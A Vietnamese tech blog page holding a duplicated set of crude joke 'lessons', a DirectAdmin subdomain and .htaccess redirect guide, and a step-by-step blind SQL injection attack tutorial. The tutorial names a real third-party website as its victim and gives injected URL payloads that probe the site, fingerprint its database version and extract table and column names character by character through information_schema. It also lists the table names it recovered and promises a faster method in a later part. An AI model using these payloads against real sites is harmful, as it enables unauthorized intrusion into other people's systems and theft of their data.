Để xem nhóm máu nào thì hợp với AB nhất nhá!
Trưởng Nguyễn 's Blog
Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.
Trưởng Nguyễn 's Blog
Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.
Trưởng Nguyễn 's Blog
Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.
Trưởng Nguyễn 's Blog
Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.
Trưởng Nguyễn 's Blog
Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.
Thursday, June 21, 2012
6 bài học xương máu
---------------6 BÀI HỌC XƯƠNG MÁU------------------
--- Bài học 1 -
Ông chồng đi tắm sau khi vợ vừa mới tắm xong, đúng lúc chuông cửa reo.
Vợ vội quấn khăn tắm vào và chạy xuống mở cửa. Cửa mở thì ra là ông hàng xóm Bob. Chị vợ chưa kịp nói gì thì Bob bảo:
- Tôi sẽ cho chị 800 đô nếu chị buông cái khăn tắm kia ra .
Suy nghĩ 1 chút rồi chị vợ buông khăn tắm, đứng trần truồng trước mặt Bob. Sau vài giây ngắm nghía, Bob đưa 800 đô cho chị vợ rồi đi. Chị vợ quấn lại khăn tắm vào người rồi đi lên nhà.
Vào đến phòng tắm, chồng hỏi: Ai đấy em?
- Vợ: ông Bob hàng xóm.
- Chồng: Tốt. thế hắn có nói gì đến số tiền 800 đô hắn nợ anh không?
--> Bài học xương máu: Nếu anh trao đổi thông tin tín dụng với cổ đông của mình kịp thời thì anh đã có thể ngăn được sự “phơi bày”.
----------
- Bài học 2 -
1 nhân viên bán hàng, 1 thư ký hành chính và 1 Sếp quản lý cùng đi ăn trưa với nhau, họ bắt được 1 cây đèn dầu cổ. Họ xoa tay vào đèn và thần đèn hiện lên. Thần đèn bảo: “ta cho các con mỗi đứa 1 điều ước”.
-Tôi trước! tôi trước! – thư ký hành chính nhanh nhảu nói: tôi muốn được ở Bahamas lái canô và quên hết sự đời. Puff. Cô thư ký biến mất.
Tôi! Tôi! anh nhân viên bán hàng nói: tôi muốn ở Hawaii nằm dài trên bãi biển có nhân viên massage riêng, nguồn cung cấp Pina Coladas vô tận và với người tình trăm năm. Puff. anh nhân viên bán hàng biến mất.
Ok tới lượt anh. Thần đèn nói với ông quản lý. Ông quản lý nói: tôi muốn 2 đứa đấy có mặt ở Văn phòng làm việc ngay sau bữa trưa.
--> Bài học xương máu: luôn luôn để Sếp phát biểu trước.
---------------
--- Bài học 3 -
Một tu-sĩ nam ngỏ ý mời tu-sĩ nữ đi chung xe. Người nữ chui vào xe, ngồi bắt chéo chân để lộ 1 bên bắp chân. Người nam suýt nữa thì gây tai nạn. Sau khi điều chỉnh lại tay lái, người nam thò tay mò mẫm lên đùi người nữ. Nữ kêu: “Xin ngài, hãy nhớ điều răn 129″. Nam liền bỏ tay ra. Nhưng sau khi vào số, nam lại tiếp tục sờ soạng chân nữ. Một lần nữa nữ kêu: “Xin ngài, hãy nhớ điều răn 129″. Nam thẹn quá: “xin lỗi nữ, tôi trần tục quá”. Tới nơi, nữ thở dài và bỏ đi. Vừa tới nhà tu, nam vội chạy vào thư viện tra cứu ngay cái điều răn 129 ấy, thấy đề: "Hãy tiến lên, tìm kiếm, xa hơn nữa, con sẽ tìm thấy hào quang."
--> Bài học xương máu: Nếu anh không nắm rõ thông tin trong công việc của mình anh sẽ bỏ lỡ 1 cơ hội lớn.
--------------
--- Bài học 4 -
Một con gà tây trò chuyện với một con bò. “Tớ muốn mình có thể trèo tới trên ngọn cây kia,” nó thở dài than, “nhưng tớ chẳng đủ sức.” “Sao cậu không nhấm nháp chút đồ phế thải của tớ?” Con bò đáp, “Bổ lắm đó.” Con gà tây đớp vào đống phân bò và thực sự có được sức mạnh để trèo được lên một cành cây thấp nhất.Ngày hôm sau, sau khi đớp thêm một mớ phân bò nữa, con gà tây leo lên được cành thứ hai. Cuối cùng, sau bốn hôm đớp phân bò như thế, con gà tây hãnh diện trèo được lên đậu trên ngọn cây.Tức thì nó bị một nông dân trông thấy, và ông ta bắn nó rơi khỏi ngọn cây.
--> Bài học xương máu: Xạo sự,dối trá có thể đưa anh lên đỉnh cao,nhưng không giúp anh bám trụ được lâu dài.
--------------
--- Bài học 5 -
Con chim nhỏ bay về phương Nam tránh rét.Trới lạnh quá con chim bị đông cứng lại và rơi xuống một cánh đồng lớn.Trong lúc nó nắm đấy một con bò đi qua ị vào người nó.Con chim nằm giữa đống phân bò nhận ra rằng người nó đang ấm dần.Đống phân ấy ủ ấm cho nó.Nó nằm đấy thấy ấm áp và hạnh phúc,nó bắt đầu cất tiếng hót yêu đời.Con mèo đi ngang nghe tiếng chim hót liền tới thám thính.Lần theo âm thanh con mèo phát hiện ra con chim nằm dưới đống phân,nó liền bới con chim ra ăn thịt.
--> Bài học xương máu:
1. Người ị vào mình chưa hẳn là kẻ thù của mình
2. Người kéo mình ra khỏi đống đống phân chưa hẳn là bạn mình
3. Và khi đang ngập ngụa trong đống phân thì tốt nhất là ngậm cái mồm lại.
------------
- Bài học 6 -
1 con đại bàng đang đậu trên cây nghỉ ngơi,chẳng làm gì cả. 1 con thỏ con nhìn thấy thế hỏi: Tôi có thể ngồi không và chẳng làm gì như anh được không? Đại bàng trả lời: được chứ, sao không. Thế là con thỏ ngồi xuống nghỉ ngơi. Bỗng dưng 1 con cáo xuất hiện, vồ lấy ăn thịt con thỏ.
--> Bài học xương máu:
Để được ngồi không chẳng làm gì anh phải ngồi ở trên cao, cao thật là cao.
--- Bài học 1 -
Ông chồng đi tắm sau khi vợ vừa mới tắm xong, đúng lúc chuông cửa reo.
Vợ vội quấn khăn tắm vào và chạy xuống mở cửa. Cửa mở thì ra là ông hàng xóm Bob. Chị vợ chưa kịp nói gì thì Bob bảo:
- Tôi sẽ cho chị 800 đô nếu chị buông cái khăn tắm kia ra .
Suy nghĩ 1 chút rồi chị vợ buông khăn tắm, đứng trần truồng trước mặt Bob. Sau vài giây ngắm nghía, Bob đưa 800 đô cho chị vợ rồi đi. Chị vợ quấn lại khăn tắm vào người rồi đi lên nhà.
Vào đến phòng tắm, chồng hỏi: Ai đấy em?
- Vợ: ông Bob hàng xóm.
- Chồng: Tốt. thế hắn có nói gì đến số tiền 800 đô hắn nợ anh không?
--> Bài học xương máu: Nếu anh trao đổi thông tin tín dụng với cổ đông của mình kịp thời thì anh đã có thể ngăn được sự “phơi bày”.
----------
- Bài học 2 -
1 nhân viên bán hàng, 1 thư ký hành chính và 1 Sếp quản lý cùng đi ăn trưa với nhau, họ bắt được 1 cây đèn dầu cổ. Họ xoa tay vào đèn và thần đèn hiện lên. Thần đèn bảo: “ta cho các con mỗi đứa 1 điều ước”.
-Tôi trước! tôi trước! – thư ký hành chính nhanh nhảu nói: tôi muốn được ở Bahamas lái canô và quên hết sự đời. Puff. Cô thư ký biến mất.
Tôi! Tôi! anh nhân viên bán hàng nói: tôi muốn ở Hawaii nằm dài trên bãi biển có nhân viên massage riêng, nguồn cung cấp Pina Coladas vô tận và với người tình trăm năm. Puff. anh nhân viên bán hàng biến mất.
Ok tới lượt anh. Thần đèn nói với ông quản lý. Ông quản lý nói: tôi muốn 2 đứa đấy có mặt ở Văn phòng làm việc ngay sau bữa trưa.
--> Bài học xương máu: luôn luôn để Sếp phát biểu trước.
---------------
--- Bài học 3 -
Một tu-sĩ nam ngỏ ý mời tu-sĩ nữ đi chung xe. Người nữ chui vào xe, ngồi bắt chéo chân để lộ 1 bên bắp chân. Người nam suýt nữa thì gây tai nạn. Sau khi điều chỉnh lại tay lái, người nam thò tay mò mẫm lên đùi người nữ. Nữ kêu: “Xin ngài, hãy nhớ điều răn 129″. Nam liền bỏ tay ra. Nhưng sau khi vào số, nam lại tiếp tục sờ soạng chân nữ. Một lần nữa nữ kêu: “Xin ngài, hãy nhớ điều răn 129″. Nam thẹn quá: “xin lỗi nữ, tôi trần tục quá”. Tới nơi, nữ thở dài và bỏ đi. Vừa tới nhà tu, nam vội chạy vào thư viện tra cứu ngay cái điều răn 129 ấy, thấy đề: "Hãy tiến lên, tìm kiếm, xa hơn nữa, con sẽ tìm thấy hào quang."
--> Bài học xương máu: Nếu anh không nắm rõ thông tin trong công việc của mình anh sẽ bỏ lỡ 1 cơ hội lớn.
--------------
--- Bài học 4 -
Một con gà tây trò chuyện với một con bò. “Tớ muốn mình có thể trèo tới trên ngọn cây kia,” nó thở dài than, “nhưng tớ chẳng đủ sức.” “Sao cậu không nhấm nháp chút đồ phế thải của tớ?” Con bò đáp, “Bổ lắm đó.” Con gà tây đớp vào đống phân bò và thực sự có được sức mạnh để trèo được lên một cành cây thấp nhất.Ngày hôm sau, sau khi đớp thêm một mớ phân bò nữa, con gà tây leo lên được cành thứ hai. Cuối cùng, sau bốn hôm đớp phân bò như thế, con gà tây hãnh diện trèo được lên đậu trên ngọn cây.Tức thì nó bị một nông dân trông thấy, và ông ta bắn nó rơi khỏi ngọn cây.
--> Bài học xương máu: Xạo sự,dối trá có thể đưa anh lên đỉnh cao,nhưng không giúp anh bám trụ được lâu dài.
--------------
--- Bài học 5 -
Con chim nhỏ bay về phương Nam tránh rét.Trới lạnh quá con chim bị đông cứng lại và rơi xuống một cánh đồng lớn.Trong lúc nó nắm đấy một con bò đi qua ị vào người nó.Con chim nằm giữa đống phân bò nhận ra rằng người nó đang ấm dần.Đống phân ấy ủ ấm cho nó.Nó nằm đấy thấy ấm áp và hạnh phúc,nó bắt đầu cất tiếng hót yêu đời.Con mèo đi ngang nghe tiếng chim hót liền tới thám thính.Lần theo âm thanh con mèo phát hiện ra con chim nằm dưới đống phân,nó liền bới con chim ra ăn thịt.
--> Bài học xương máu:
1. Người ị vào mình chưa hẳn là kẻ thù của mình
2. Người kéo mình ra khỏi đống đống phân chưa hẳn là bạn mình
3. Và khi đang ngập ngụa trong đống phân thì tốt nhất là ngậm cái mồm lại.
------------
- Bài học 6 -
1 con đại bàng đang đậu trên cây nghỉ ngơi,chẳng làm gì cả. 1 con thỏ con nhìn thấy thế hỏi: Tôi có thể ngồi không và chẳng làm gì như anh được không? Đại bàng trả lời: được chứ, sao không. Thế là con thỏ ngồi xuống nghỉ ngơi. Bỗng dưng 1 con cáo xuất hiện, vồ lấy ăn thịt con thỏ.
--> Bài học xương máu:
Để được ngồi không chẳng làm gì anh phải ngồi ở trên cao, cao thật là cao.
Wednesday, June 20, 2012
Cách tạo subdomain trong Direct Admin
Đầu tiên:
Bước 1:
Nếu các bạn DNS namesever
NS1: ns1.4be.vn
NS1 IP: 112.78.15.3
NS2: ns2.4be.vn
NS2 IP: 112.78.15.3
Thì không cần làm gì nữa tới bước 2
Bạn nào DNS trung gian qua everydns hay gì đó thì DNS từng sub domain về IP 112.78.15.3(cái này mình không nói nữa...)
Bước 2:
VD: forum or home
Bước 3:
Các bạn chọn Site Redirection
Tiếp đó
- Dòng đầu bạn điền folder như tên subdomain
VD: forum.thegioiteenviet.org thì điền ngay đó là /forum
- Dòng 2: bạn chọn 301 Permanent <=== cái này nha các bạn.
- Dòng 3: Điền cái subdoamin vô thôi như VD trên http://forum.thegioiteenviet.org
Bước 4: Khi bạn tạo subdomain ở bước 2 thì nó tự tạo cho bạn trong thư mục public_html của bạn những folder của subdomain sẵn rồi,
Sau đó các bạn up đè lên thay cái folder đó(có thể xóa,úp lên với cái tên như thế),nhớ là không phải úp trong folder đó.
Bước 5: F5 và xem kết quả
Một điều quan trong nữa khi bạn tạo subdomain thì trong public_html có file .htaccess với nội dung:
Redirect 301 /home http://sub.domaincuaban.com
Redirect 301 /forum http://sub.domaincuaban.com
Giờ bạn muốn nó tự chuyển trang khi vào domain sang sub.domain thì thêm cái này
RewriteEngine on
RewriteCond %{HTTP_HOST} ^domaincuaban.com$ [OR]
RewriteCond %{HTTP_HOST} ^www.domaincuaban.com$
RewriteRule ^(.*)$ "http\:\/\/sub.domaincuaban\.com$1" [R=301,L]
Khi vào domain nó tự chuyển sang sub
Saturday, June 16, 2012
Thursday, June 14, 2012
Hướng dẫn tấn công website P2
Hướng dẫn tấn công website P2
Chào các bạn.Hôm trước đã hướng dẫn các bạn tấn công qua lỗi Inband Sql injection(http://www.blog.kenjivn.net/2012/06/huong-dan-tan-cong-website-p1.html). Hôm nay mình sẽ hướng dẫn các bạn tấn công thông qua lỗi Blind Sql injection.
Điểu kiện đọc bài viết này
+ Đã đọc kỹ bài viết tấn công website P1 của mình và hiểu vì sao mình lại thực hiện những câu truy vấn như thế.
+ Đã thank vào bài viết tấn công website P1 của mình
Cách khai thác này khá là lâu,vì thế đòi hỏi bạn phải kiên trì đọc và hiểu từ đầu đến cuối
Phần 1:Lý thuyết
SQL Injection là phương thức khai thác dựa vào quá trình trao đổi dữ liệu giữa người dùng và Web Application. Việc ứng dụng không kiểm tra các giá trị đầu vào đẫn đến attacker có thể cho thực thi các SQL query không mong muốn can thiệp vào database làm thay đổi, thêm, xem hay xóa các dữ liệu.
Hacker thường khai thác bằng các gửi các giá trị đầu vào để server sinh các thông tin lỗi để từ đó tùy biến theo câu truy vấn gốc của người thiết kế.
Nếu Web Application được customize các trang lỗi hay các trang lỗi không trả về, phải làm thế nào? Hãy thử khai thác với phương thức: blind sql injection.
Sự khác nhau giữa cơ bản giữa Inband và Blind
InBand:Hiện số column lỗi ra,ta có thể khai thác dễ dàng.
Blind :Không hiện số column lỗi.
Lấy ví dụ câu truy vấn dạng Blind thế này
Câu truy vấn 1.
Trích:
Mã:
Select content From news Where new_id=$_get[‘id’] and 1=1
Trích:
Mã:
Select content ,comment From news Where news_id=$_get[‘id’]
Đầu tiền mình giới thiệu các hàm hữu ích khi khai thác thông qua lỗi Blind sql injection.
Trích:
[CODE]convert(int,(function/query)):Convert giá trị của câu query phía sau ra kiểu int
substring(string,vị trí,số lương):Hàm cắt chuỗi
Ví dụ substring('mình',1,2) :Nghĩa là từ vị trí số 1 lấy 2 giá trị.Kết quả là kt
ascii():Kết quả trả về là giá trị mã ascii
Mã:
Ví dụ:ascii(A) kết quả là 65 limit(query,x,y) :Tương tự substring()
Victim:http://www.julianfantino.ca (Cái này có đứa trong xgroup hỏi mà mấy đứa reply thì cứ xài tool)có đứa đưa query thì dấu cha cái link.Thôi thì mình hướng dẫn vậy.( http://www.xgroup.vn/XgR/showthread.php?t=9765 )
Bước 1 Kiểm tra lỗi
Mã:
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920'
Thử xem nó thực hiện câu truy vấn không.
Mã:
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and 1=0
Mã:
[HTML]
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and 1=1
Vậy là nó thực hiện câu truy vấn đăng sau rồi nhé
Bước 2: Kiểm tra version của nó
Mã:
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and substring(version(),1,1)=5
Mã:
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and substring(version(),1,1)>5
Vậy kết luận version của nó là 5. mấy đó.Nói chung là lớn hơn 4 là ok rồi.vì có thể lấy được thông tin table từ database hệ thông information_schema.
Đên đây mình dừng việc kiểm tra lại.Bạn nào muốn biết 5.0 mấy thi dùng tiếp câu truy vấn
Mã:
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and substring(version(),2,1)=0 --
Bước 3. Lấy table_name từ table tables trong data hệ thống information_schema
Đầu tiên ta lấy ký tự đầu tiên của table đầu tiên.Câu truy vấn khá dễ hiểu vì mình đã giải thích các hàm ở trên hết rồi.
Trích:
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and ASCII(SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>64 --
Trích:
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and ASCII(SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>65 --
Lấy ký tự thứ 2 của table đầu tiên
Trích:
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and ASCII(SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))>99 --
=>Kết quả trả về bình thường
Trích:
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and ASCII(SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))>100 --
Làm tương tự các bạn sẽ được các ký tự khác của table đầu tiên.và ra table đầu tiên có giá trị là AddressTypes
Tương tự để tìm table thứ 2,các bạn chỉ việc thay limit 1,1 thành limit 2,1
Giá trị các table sau khi lấy là LanguageCategoryRe ,JSLibrary,JSConfigDomains ,JSConfig ,INTERFACE_ELEMENTS ,GroupOwnershipPermissions ,GeoSearchRegions ,GeoSearchPostalCodes ,GeoSearchDistrictsToPostalCodes,GeoSearchDistrict s,GeoSearchContacts,GeoSearchContactTypes,FILE_CAT EGORIES,FILES,DomainLibraryIncludes,DomainLanguage s,DefaultSequence_seq,Countries,ContentArticleLink s,ContentArticleGroups,Component,CompMailouts,Cate goryType,Category,CategoriesToArticles,CanadaPostA ddresses,AuxillaryGroupLookup,ArticleSequence_seq ,Addresses,AddressTypes,ARTICLE_MODULES
Bước 4.Lấy column từ những table đã khai thác được
Lấy ký tự đầu tiên của column đầu tiên trong table AddressTypes
Trích:
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and ascii(substring((select column_name from information_schema.columns where table_name='AddressTypes' limit 1,1),1,1))>77 --
Trích:
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920
Mã:
and ascii(substring((select column_name from information_schema.columns where table_name='AddressTypes' limit 1,1),1,1))>78 --
=>Khác thường(rỗng)
Vậy ký tự đầu tiền có giá trị trong ascii là 78 là N
.....
Làm tương tự ta được column đầu tiên là Name
Tiếp tục thay limit 2,1 để lấy column thứ 2,ta được column thứ 2 có tên là Id
Sau đó tiếp tục khai thác column của những table khác nhé.Cố gắng lên
Bước 5.Lấy giá trị từ những column khai thác.(Đến đây tớ đuối quá rồi,table mình khác ko có mới đau chứ )
Cách lấy:
Trích:
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and ascii(substring((select gia tri colum from gia tri table limit 1,1),1,1))=0 --
Cách khai thác này đòi hỏi các bạn phải kiên trì,mà thường gặp loại này thì xài tools,khi nào xài tools không được thì mới query bằng tay Những tool thì các bạn không hiểu bản chất
Chú ý:Trên đây là cách khai thác thông thường từ thời xa xưa,hiện nay có 1 cách mới nhanh hơn,show ra table luôn đó cách này thấy havij chưa hỗ trợ,havij xài cách get từng ký tự)=>Cách này mình sẽ hướng dẫn cho các bạn ở P3.
